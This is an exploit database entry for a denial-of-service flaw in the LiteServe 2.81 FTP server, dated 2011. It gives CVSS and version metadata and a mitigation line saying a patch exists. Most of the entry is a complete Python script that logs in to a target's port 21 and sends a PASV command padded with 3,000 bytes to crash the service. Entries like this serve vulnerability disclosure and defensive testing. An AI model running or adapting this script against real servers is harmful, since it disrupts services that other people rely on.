LiteServe 2.81 PASV Command DoS

vendor:

LiteServe

by:

Craig Freyman

7.5

CVSS

HIGH

Denial of Service

400

CWE

Product Name: LiteServe

Affected Version From: 2.81

Affected Version To: 2.81

Patch Exists: YES

Related CWE: N/A

CPE: //a:cmfperception:liteserve

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows XP SP3 and Server 2003 SP2

2011

LiteServe 2.81 PASV Command DoS

This exploit causes a denial of service in LiteServe 2.81 by sending a large number of characters in the PASV command. In certain conditions, registers were overwritten. There are a number of other FTP commands that exhibit the same behavior.

Mitigation:

Upgrade to the latest version of LiteServe, which includes a patch for this vulnerability.

Source

Exploit-DB raw data:

#!/usr/bin/python
#Title: LiteServe 2.81 PASV Command DoS
#Author: Craig Freyman (@cd1zz)
#Date: Bug found July 25, 2011 - Vendor approved release August 7, 2011
#Tested on Windows XP SP3 and Server 2003 SP2
#Software: http://www.cmfperception.com/liteserve.html
#Notes: In certain conditions that I could not reproduce reliably, registers were
#overwritten. There are a number of other FTP commands that exhibit the same behavior.

import socket,sys,time,struct

if len(sys.argv) < 2:
     print "[-]Usage: %s <target addr> " % sys.argv[0]
     sys.exit(0)

target = sys.argv[1]

if len(sys.argv) > 2:
     platform = sys.argv[2]

crash = "\x41" * 3000

s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)

try:
    s.connect((target,21))
except:
    print "[-] Connection to "+target+" failed!"
    sys.exit(0)

print "[*] Sending " + `len(crash)` + " byte crash..."

s.send("USER test\r\n")
s.recv(1024)
s.send("PASS test\r\n")
s.recv(1024)
s.send("PASV "+crash+"\r\n")
print "Sleeping..."
time.sleep(5)
s.close()